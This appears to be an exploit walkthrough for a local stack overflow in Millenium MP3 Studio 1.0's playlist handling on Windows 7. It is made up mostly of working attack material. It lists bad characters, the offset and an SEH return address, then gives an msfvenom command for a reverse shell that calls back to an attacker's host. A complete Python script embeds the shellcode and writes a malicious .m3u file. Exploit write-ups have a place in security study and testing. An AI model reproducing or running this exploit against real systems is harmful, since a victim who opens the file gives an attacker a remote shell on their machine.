Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2) Walkthrough

(Updated: )
reference Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

Actually the original exploit still generates m3u playlist.
So this post will focus on m3u file format.

badchar

omitted
\x00\x0a\x0d\x1a

offset

omitted
4107

return address

seh

omitted
xaudio.dll 0x1001f668

shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a\x0d\x1a"

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
shellcode =  b""
shellcode += b"\xb8\xcb\xdf\x29\x1c\xda\xc7\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc"
shellcode += b"\x03\x89\xd1\xcb\xe9\xf1\x06\x89\x12\x09\xd7"
shellcode += b"\xee\x9b\xec\xe6\x2e\xff\x65\x58\x9f\x8b\x2b"
shellcode += b"\x55\x54\xd9\xdf\xee\x18\xf6\xd0\x47\x96\x20"
shellcode += b"\xdf\x58\x8b\x11\x7e\xdb\xd6\x45\xa0\xe2\x18"
shellcode += b"\x98\xa1\x23\x44\x51\xf3\xfc\x02\xc4\xe3\x89"
shellcode += b"\x5f\xd5\x88\xc2\x4e\x5d\x6d\x92\x71\x4c\x20"
shellcode += b"\xa8\x2b\x4e\xc3\x7d\x40\xc7\xdb\x62\x6d\x91"
shellcode += b"\x50\x50\x19\x20\xb0\xa8\xe2\x8f\xfd\x04\x11"
shellcode += b"\xd1\x3a\xa2\xca\xa4\x32\xd0\x77\xbf\x81\xaa"
shellcode += b"\xa3\x4a\x11\x0c\x27\xec\xfd\xac\xe4\x6b\x76"
shellcode += b"\xa2\x41\xff\xd0\xa7\x54\x2c\x6b\xd3\xdd\xd3"
shellcode += b"\xbb\x55\xa5\xf7\x1f\x3d\x7d\x99\x06\x9b\xd0"
shellcode += b"\xa6\x58\x44\x8c\x02\x13\x69\xd9\x3e\x7e\xe6"
shellcode += b"\x2e\x73\x80\xf6\x38\x04\xf3\xc4\xe7\xbe\x9b"
shellcode += b"\x64\x6f\x19\x5c\x8a\x5a\xdd\xf2\x75\x65\x1e"
shellcode += b"\xdb\xb1\x31\x4e\x73\x13\x3a\x05\x83\x9c\xef"
shellcode += b"\x8a\xd3\x32\x40\x6b\x83\xf2\x30\x03\xc9\xfc"
shellcode += b"\x6f\x33\xf2\xd6\x07\xde\x09\xb1\xe7\xb7\x10"
shellcode += b"\x18\x80\xc5\x12\x9b\xeb\x43\xf4\xf1\x1b\x02"
shellcode += b"\xaf\x6d\x85\x0f\x3b\x0f\x4a\x9a\x46\x0f\xc0"
shellcode += b"\x29\xb7\xde\x21\x47\xab\xb7\xc1\x12\x91\x1e"
shellcode += b"\xdd\x88\xbd\xfd\x4c\x57\x3d\x8b\x6c\xc0\x6a"
shellcode += b"\xdc\x43\x19\xfe\xf0\xfa\xb3\x1c\x09\x9a\xfc"
shellcode += b"\xa4\xd6\x5f\x02\x25\x9a\xe4\x20\x35\x62\xe4"
shellcode += b"\x6c\x61\x3a\xb3\x3a\xdf\xfc\x6d\x8d\x89\x56"
shellcode += b"\xc1\x47\x5d\x2e\x29\x58\x1b\x2f\x64\x2e\xc3"
shellcode += b"\x9e\xd1\x77\xfc\x2f\xb6\x7f\x85\x4d\x26\x7f"
shellcode += b"\x5c\xd6\x56\xca\xfc\x7f\xff\x93\x95\x3d\x62"
shellcode += b"\x24\x40\x01\x9b\xa7\x60\xfa\x58\xb7\x01\xff"
shellcode += b"\x25\x7f\xfa\x8d\x36\xea\xfc\x22\x36\x3f"

payload = "http://"
payload += "A" * (4107 - 4)
payload += "\xeb\x26\x41\x41"
payload += "\x68\xf6\x01\x10"
payload += "\x90" * 32
payload += shellcode

with open("exploit.m3u", "w") as fp:
    fp.write(payload)

proof

Open File(s)...